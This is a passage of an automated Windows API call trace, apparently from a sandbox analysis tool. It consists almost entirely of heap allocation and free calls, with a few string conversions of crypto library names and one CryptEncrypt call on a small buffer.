dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0262.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0262.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0262.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0262.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0262.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0262.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0262.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0262.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0262.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0262.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0262.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0262.935] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0262.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0262.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0262.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0262.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0262.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0262.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0262.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0262.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0262.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0262.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0262.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0262.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0262.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0262.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x192) returned 0x978490 [0262.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0262.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0262.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x192) returned 0x978630 [0262.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0262.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0262.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0262.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0262.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0262.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0262.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0262.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0262.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0262.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0262.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978630 | out: hHeap=0x970000) returned 1 [0262.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0262.936] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0262.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0262.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0262.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0262.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0262.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0262.937] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0262.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0262.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0262.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519d0 [0262.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0262.937] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0262.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0262.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0262.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0262.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0262.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0262.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0262.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0262.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0262.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0262.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0262.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0262.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0262.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0262.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0262.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0262.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0262.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0262.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0262.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0262.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0262.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0262.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0262.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0262.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0262.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0262.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0262.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0262.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0262.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0262.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0262.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0262.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0262.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0262.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0262.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0262.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0262.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0262.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0262.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0262.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0262.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0262.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0262.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0262.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0262.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0262.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0262.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0262.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0262.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0262.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0262.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0262.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0262.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0262.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c28 [0262.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0262.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0262.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0262.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0262.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0262.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0262.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0262.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0262.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0262.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0262.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0262.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0262.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0262.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0262.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x192) returned 0x978490 [0262.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0262.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0262.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0262.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0262.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0262.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0262.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0262.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0262.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0262.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0262.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x3be0388 [0262.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0262.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0262.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0262.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0262.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0262.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0262.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0262.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0262.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0262.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0262.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0262.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0262.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0262.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0262.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0262.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0262.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0262.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0262.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0262.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0262.941] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0262.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0262.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0262.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0262.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0262.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0262.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0262.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0262.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0262.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0262.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0262.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0262.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0262.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0262.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0262.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0262.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0262.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0262.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0262.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0262.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0262.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55308 [0262.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0262.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0262.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51e98 [0262.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51e98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0262.943] CryptEncrypt (in: hKey=0xa87310, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3be01e8*, pdwDataLen=0x8cef60*=0x192, dwBufLen=0x198 | out: pbData=0x3be01e8*, pdwDataLen=0x8cef60*=0x198) returned 1 [0262.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0262.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0262.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551b8 [0262.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0262.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0262.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0262.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552e8 [0262.944] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55268 [0262.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55278 [0262.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55288 [0262.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0262.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551f8 [0262.944] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.944] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552c8 [0262.944] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0262.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0262.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0262.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0262.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0262.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0262.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0262.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0262.945] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0262.945] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0262.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0262.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0262.945] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0262.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0262.945] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0262.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0262.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0262.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51928 [0262.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0262.946] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0262.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0262.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0262.946] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0262.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0262.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0262.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51940 [0262.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0262.946] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0262.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0262.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0262.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0262.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0262.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0262.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0262.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0262.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0262.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0262.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a78 [0262.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 